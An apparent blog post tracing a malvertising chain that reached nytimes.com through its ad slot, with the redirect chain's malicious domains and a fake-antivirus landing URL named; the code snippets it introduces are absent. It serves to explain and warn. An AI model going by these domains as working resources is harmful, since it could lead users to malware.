Anatomy of a Malware Ad on NYTimes.com
On Saturday evening, Avast displayed a malware warning as I loaded a nytimes.com article. After some digging, here’s the malware I found.
Ad Delivery
nytimes.com article pages include an ad placement with the HTML DOM ID adxBigAd. From loading a few articles, they seems to rotate between a banner and an iframe.
On this article, a 300×250 iframe was inlining this URL: tradenton.com slash ?id=21610438
(note: I don’t recommend visiting it, and have URLs are not linked where possible)
A comment gave the campaign ID asVonage01_1163613_nyt12, though it was obviously unrelated to Vonage. tradenton.com was registered Sept. 2, 2009, so it may have had a previous owner.
Injection
tradenton.com serves a 15-line HTML snipped containing this JavaScript:
As anyone who has looked at phishing links knows, this is nasty on a couple levels. It’s eval()’ing escaped code, which is almost never needed to serve an ad. Note that the variable action_URL is defined but never used. After unescaping the code, this is what’s being run:
What’s served by harlingens.com slash includes02.js? Aha! The eval’ed JavaScript is requesting a second Javascript, which hits action_URL:
Malware
Now we’re talking. Requesting that action_URL on sex-and-the-city.cn actually serves a HTTP 302 Redirect to protection-check07.com slash 1/?sess=%3DGQx3jzwMi02MyZpcD0yMDguNzUuNTcuMTIxJnRpbWU9MTI1NjgwMI0MaQ%3DN. And we hit pay dirt. It’s a fake page for a non-existent antivirus app, which is actually malware. Titled “My computer Online Scan“, this page displays this JS alert:
0 comments:
Post a Comment